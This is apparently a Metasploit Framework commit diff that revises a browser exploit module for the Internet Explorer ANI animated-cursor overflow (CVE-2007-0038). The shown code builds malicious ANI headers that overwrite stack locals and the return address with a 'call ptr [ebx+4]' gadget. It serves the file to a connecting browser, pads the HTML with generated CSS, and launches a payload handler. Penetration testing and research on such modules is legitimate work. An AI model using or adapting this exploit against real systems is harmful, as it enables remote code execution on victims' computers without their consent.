This module should be ready for the stable tree...

git-svn-id: file:///home/svn/framework3/trunk@4597 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/windows/browser/ani_loadimage_chunksize.rb

@@ -146,6 +146,9 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 			mytargs = (target.name =~ /All Targets/) ? targets : [target]
 	
 			mytargs.each_index do |i|
+			
+				next if not mytargs[i].ret
+				
 				html <<	"<div style='" +
 						generate_css_padding() +
 						Rex::Text.to_rand_case("cursor") +
@@ -166,6 +169,8 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 					"</div>"
 			end
 			
+			html << "</body></html>"
+			
 			send_response_html(cli, html)
 			return
 		end
@@ -181,12 +186,12 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
 
 		# Transmit the compressed response to the client
-		send_response(cli, generate_ani(p), { 'Content-Type' => 'application/octet-stream' })
+		send_response(cli, generate_ani(p, target), { 'Content-Type' => 'application/octet-stream' })
 		
 		handler(cli)
 	end
 
-	def generate_ani(payload)
+	def generate_ani(payload, target)
 
 		# Build the first ANI header
 		anih_a = [
@@ -201,8 +206,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 		
 		anih_b = nil
 
-		case target.name
-		when /Vista/		
+		if (target.name =~ /Vista/)
 			# Vista has ebp=80, eip=84
 			anih_b         = anih_a + rand_text(84-anih_a.length)
 			
@@ -215,7 +219,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 			# Overwrite locals with invalid pointers
 			anih_b[64, 12] = [0x80000000 | rand(0xffffffff)].pack('V') * 3
 		end
-
+				
 		# Overwrite the return with address of a "call ptr [ebx+4]"
 		anih_b << [target.ret].pack('V')[0, target['Len'] ? target['Len'] : 4]